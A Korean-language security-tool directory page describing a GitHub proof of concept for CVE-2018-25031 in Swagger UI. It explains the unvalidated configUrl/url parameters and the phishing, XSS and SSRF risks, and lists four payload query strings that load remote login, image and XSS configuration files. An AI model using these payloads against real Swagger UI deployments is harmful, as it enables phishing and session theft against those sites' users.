Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS]. | Kitploit
도구/GitHubGitHub/relichunt3r/swagger-ui
Phishing ToolsVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].

저장소 보기
510개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

소개: Swagger UI의 역할

Swagger UI는 OpenAPI(이전 명칭 Swagger) 명세를 대화형 웹 인터페이스로 렌더링하는 널리 사용되는 라이브러리입니다. 이를 통해 개발자와 통합자는 백엔드 구현 없이도 API를 탐색하고 테스트할 수 있습니다.

CVE‑2018‑25031 상세 정보

근본 원인: 원격 명세 로딩

이 취약점은 Swagger UI 클라이언트가 원격 설정 또는 명세 파일을 로드하는 데 사용하는 URL 쿼리 매개변수의 유효성 검사가 불충분하여 발생합니다. 관련된 일반적인 매개변수는 다음과 같습니다.

  • ?url=.yaml
  • ?configUrl=.json

공격자는 이러한 매개변수를 원격으로 호스팅되는 공격자 제어 OpenAPI 정의 또는 설정 파일을 가리키도록 할 수 있으며, 이는 취약한 인스턴스에서 렌더링될 수 있습니다.

잠재적인 공격 벡터

악성 원격 파일을 로드하면 호스팅 구성 및 적용된 보호 조치에 따라 여러 가지 영향력이 큰 결과가 발생할 수 있습니다.

  1. HTML 삽입(HTMLi) / 피싱 - 주입된 파일에는 시각적으로 콘텐츠를 스푸핑하는 임의의 HTML(예: 가짜 로그인 양식)이 포함될 수 있으며, 자체 호스팅 인스턴스의 신뢰할 수 있는 도메인을 악용합니다.
  2. 교차 사이트 스크립팅(XSS) - 주입된 콘텐츠에 실행 가능한 JavaScript가 포함된 경우 DOM XSS가 발생하여 세션 도난 또는 사용자를 대신한 작업이 가능해질 수 있습니다.
  3. 서버 측 요청 위조(SSRF) - 서버가 클라이언트를 대신하여 원격 명세를 가져오는 경우, 공격자는 서버가 내부 엔드포인트에 요청을 보내도록 강제하여 민감한 리소스를 노출시킬 수 있습니다.

참고 자료:

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

개념 증명(POC)

페이로드

1 - 로그인

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - 원격 로그인

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - 이미지

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 면책 조항

이 저장소의 콘텐츠는 교육 및 정보 제공 목적으로만 제공됩니다. 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다. 사용 전에 적절한 권한을 확인하고, 책임감 있게 행동하며, 모든 법적 및 윤리적 지침을 준수하시기 바랍니다.

도구 다운로드